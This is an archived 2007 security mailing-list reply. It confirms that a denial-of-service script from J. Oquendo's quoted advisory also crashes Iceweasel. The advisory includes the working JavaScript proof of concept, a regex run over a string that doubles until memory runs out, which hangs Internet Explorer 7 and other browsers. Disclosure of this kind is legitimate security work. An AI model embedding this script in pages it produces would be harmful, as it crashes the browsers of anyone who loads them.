|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
From: The Anarcat (anarcat
anarcat.ath.cx)
Date: Tue Apr 17 2007 - 15:27:45 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Actually, this also crashes Mozilla/5.0 (X11; U; Linux i686; en-US;
rv:1.8.1.3) Gecko/20070310 Iceweasel/2.0.0.3 (Debian-2.0.0.3-1)
I would think that Firefox and most browsers implementing javascript
would die an horrible OOM death on this.
A.
On Tue, Apr 17, 2007 at 01:09:13PM -0400, J. Oquendo wrote:
>
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> Product: Internet Explorer Version 7.0.5730.11
> Impact: Browser crash possibly more
> Author: Jesus Oquendo
> echo infiltrated|sed 's/^/sil/g;s/$/.net/g'
>
>
> I. BACKGROUND
> Why bother? Who doesn't know what Internet Explorer and Microsoft are.
>
> II. DESCRIPTION
> IE 7 is vulnerable to a script which causes the browser to hang. The
> memory and CPU usage go through the roof. Originally the script caused
> (and still causes) Safari and Konqueror to crash.
>
> III SOLUTION
> Stop using Microsoft products or deal with a new advisory every other
> day.
>
> IV. Proof
> http://www.infiltrated.net/stupidInternetExploder.html
>
> V. Code
>
> $ more /stupidInternetExploder.html
>
> <script>
>
> var reg = /(.)*/;
>
> var z = 'Z';
> while (z.length <=
> 999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
> 99999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
> 99999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
> 99999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
> 999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999) z+=z;
> var boum = reg.exec(z);
>
> </script>
>
> Goodbye
>
>
> J. Oquendo
> http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x1383A743
> sil . infiltrated net http://www.infiltrated.net
>
> The happiness of society is the end of government.
> John Adams
>
>
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.4.3 (FreeBSD)
>
> iD8DBQFGJQGJh3J3NhODp0MRArt5AKCVI+A0rHdYMOz9KYIbCxFkMN8QcgCbBBBC
> TCV7FOqA05H8sSDb0r8nSnk=
> =J/DW
> -----END PGP SIGNATURE-----
>
--
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)
iD8DBQFGJS3AWGBzs0AjcC8RAsKTAJ9oa1TJKb+93ge3xgxjqTxBxYp1NQCgkuZS
6OP+eoM7+CgvzMZ7BXYygCE=
=YDwf
-----END PGP SIGNATURE-----
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]